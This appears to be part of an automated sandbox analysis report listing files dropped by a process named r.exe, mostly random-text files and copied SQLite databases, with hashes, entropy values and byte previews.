                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.695685570184741
                  Encrypted:false
                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                  Malicious:false
                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.701757898321461
                  Encrypted:false
                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                  MD5:520219000D5681B63804A2D138617B27
                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                  Malicious:false
                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):98304
                  Entropy (8bit):0.08235737944063153
                  Encrypted:false
                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):98304
                  Entropy (8bit):0.08235737944063153
                  Encrypted:false
                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
